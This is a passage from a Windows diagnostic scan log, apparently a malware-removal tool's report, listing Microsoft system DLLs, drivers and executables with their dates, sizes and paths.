2020-08-17 21:33 - 2020-08-17 21:33 - 000471552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mbsmsapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000469504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000467968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\daxexec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000467968 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000467960 _____ (Microsoft Corporation) C:\Windows\system32\Faultrep.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000467456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Picker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000466432 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Printing.Workflow.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000466344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000465408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srmscan.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000463272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFPlay.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000463168 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000462848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000462848 _____ (Microsoft Corporation) C:\Windows\system32\iassdo.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000461112 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000460288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AcSpecfc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000457016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000456704 _____ (Microsoft Corporation) C:\Windows\system32\upnphost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000456192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appwiz.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000455680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000454736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppResolver.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000453944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WerFault.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000453632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CredProvDataModel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000452096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TileDataRepository.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000451864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWanAPI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000450560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxdiagn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000450360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11on12.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\fhsettingsprovider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\edgeIso.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000442704 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.AllJoyn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000442096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000440832 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000437776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fltMgr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000437760 _____ (Microsoft Corporation) C:\Windows\system32\P2PGraph.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000437248 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000435712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WwaApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000435200 _____ (Microsoft Corporation) C:\Windows\system32\wincorlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000432640 _____ (Microsoft Corporation) C:\Windows\system32\WalletService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000431616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.BioFeedback.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000431616 _____ (Microsoft Corporation) C:\Windows\system32\AccountsRt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000431104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasgcw.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000430592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000430080 _____ (Microsoft Corporation) C:\Windows\system32\fhcfg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000428544 _____ (Microsoft Corporation) C:\Windows\system32\p2psvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000426496 _____ (Microsoft Corporation) C:\Windows\system32\termmgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000423936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputSwitch.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000423936 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.CscUnpinTool.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000423424 _____ (Microsoft Corporation) C:\Windows\system32\rdpencom.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000422400 _____ (Microsoft Corporation) C:\Windows\system32\mswmdm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000422008 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave_secure.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000421376 _____ (curl, hxxps://curl.haxx.se/) C:\Windows\system32\curl.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000420352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imapi2.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000420152 _____ (Microsoft Corporation) C:\Windows\system32\MSAudDecMFT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000419328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000417280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SessEnv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000416768 _____ (Microsoft Corporation) C:\Windows\system32\RDXTaskFactory.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000416056 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000415760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winspool.drv
2020-08-17 21:33 - 2020-08-17 21:33 - 000412672 _____ (Microsoft Corporation) C:\Windows\system32\AboveLockAppHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000411136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000411136 _____ (Microsoft Corporation) C:\Windows\system32\DavSyncProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000410624 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000410112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.SmartCards.Phone.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000408064 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000407864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwizeng.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000406992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Enumeration.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000406992 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000405944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Faultrep.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\DispBroker.Desktop.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000404992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000403968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Payments.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000403456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mprdim.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000401920 _____ (Microsoft Corporation) C:\Windows\system32\Wldap32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000400696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\clfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000399360 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000398728 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000398336 _____ (Microsoft Corporation) C:\Windows\system32\WlanMM.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000398336 _____ (Microsoft Corporation) C:\Windows\system32\LocationApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\SensorsApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000396088 _____ (Microsoft Corporation) C:\Windows\system32\AppVScripting.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000395776 _____ (Microsoft Corporation) C:\Windows\system32\umrdp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000394752 _____ (Microsoft Corporation) C:\Windows\system32\SearchFolder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000392704 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netshell.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000391680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000388096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.LowLevel.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000387832 _____ (Microsoft Corporation) C:\Windows\system32\wmpps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000387584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000387584 _____ (Microsoft Corporation) C:\Windows\system32\provplatformdesktop.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000386320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000386048 _____ (curl, hxxps://curl.haxx.se/) C:\Windows\SysWOW64\curl.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000384512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\puiobj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000384000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000384000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000383984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MMDevAPI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000382976 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntshrui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000380928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AcLayers.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000380416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000379840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ws2_32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000379704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000379192 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000376832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webauthn.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000376320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mspbde40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000375808 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000375520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000372752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msrpc.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000372224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000371712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Geolocation.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000369664 _____ (Microsoft Corporation) C:\Windows\system32\dxdiag.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000368128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskcomp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000366416 _____ (Microsoft Corporation) C:\Windows\system32\mfsensorgroup.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.OneCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000361472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\termmgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000361472 _____ (Microsoft Corporation) C:\Windows\system32\rdpinit.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000359936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassdo.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000359496 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000359424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BcastDVRClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000358912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.WiFiDirect.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000358912 _____ (Microsoft Corporation) C:\Windows\system32\dusmsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000358400 _____ (Microsoft Corporation) C:\Windows\system32\AcGenral.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000357176 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000356864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\P2PGraph.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\XpsDocumentTargetPrint.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\ConsoleLogon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RTMediaFrame.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Magnify.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000354304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpencom.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000353280 _____ (Microsoft Corporation) C:\Windows\system32\pnrpsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000353280 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000352256 _____ (Microsoft Corporation) C:\Windows\system32\APHostService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000350720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AccountsRt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000349184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswmdm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000346624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secproc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000345560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000345088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000344576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneOm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000344576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptngc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000344064 _____ (Microsoft Corporation) C:\Windows\system32\ncryptprov.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000343552 _____ (Microsoft Corporation) C:\Windows\system32\wpr.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000343552 _____ (Microsoft Corporation) C:\Windows\system32\RADCUI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000343408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000342528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Feedback.Analog.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000342528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AboveLockAppHost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000339456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\HrtfApo.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000338944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Picker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000338944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fveapibase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000337408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000336928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000335448 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000335360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MicrosoftAccountWAMExtension.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000333128 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000332288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wldap32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000331264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000330240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\upnphost.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000330240 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000329728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DavSyncProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000329216 _____ (Microsoft Corporation) C:\Windows\system32\DiagnosticLogCSP.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000328192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgeIso.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000328192 _____ (Microsoft Corporation) C:\Windows\system32\VAN.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000327168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000327168 _____ (Microsoft Corporation) C:\Windows\system32\ComposableShellProxyStub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000325432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000325120 _____ (Microsoft Corporation) C:\Windows\system32\rdpviewerax.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000324608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000324608 _____ (Microsoft Corporation) C:\Windows\system32\FSClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32k.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000323584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LocationApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000321536 _____ (Microsoft Corporation) C:\Windows\system32\wbadmin.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000321536 _____ (Microsoft Corporation) C:\Windows\system32\sti.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000320512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFolder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000317952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000317440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Midi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000316216 _____ (Microsoft Corporation) C:\Windows\system32\computestorage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\dmenterprisediagnostics.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000315392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxdiag.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\AcLayers.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000313344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd2x40.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WiFiDisplay.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsApi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000311440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Devices.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000311296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000309248 _____ (Microsoft Corporation) C:\Windows\system32\tapisrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000309248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000308736 _____ (Microsoft Corporation) C:\Windows\system32\msIso.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000307712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000307200 _____ (Microsoft Corporation) C:\Windows\system32\fveui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000306688 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.CredDialogController.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000306688 _____ (Microsoft Corporation) C:\Windows\system32\RASMM.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000301064 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000300392 _____ (Microsoft Corporation) C:\Windows\system32\skci.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000299520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WlanMM.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000299520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000299064 _____ (Microsoft Corporation) C:\Windows\system32\SIHClient.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000297472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TaskApis.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000295424 _____ (Microsoft Corporation) C:\Windows\system32\cscobj.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000294400 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_AnalogShell.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000293888 _____ (Microsoft Corporation) C:\Windows\system32\CXHProvisioningServer.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000293376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000293376 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore6.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000293344 _____ (Microsoft Corporation) C:\Windows\system32\cfgmgr32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000292864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.System.Diagnostics.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000292864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000292864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RADCUI.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000292352 _____ (Microsoft Corporation) C:\Windows\system32\wkssvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000291840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ahcache.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000287744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Gaming.Preview.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000287744 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacEncoder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000287744 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.ManagedEventLogging.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000287232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcomapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000285256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000283688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ttdwriter.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000283648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.NetworkOperators.ESim.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000283648 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000283648 _____ (Microsoft Corporation) C:\Windows\system32\ComposerFramework.dll
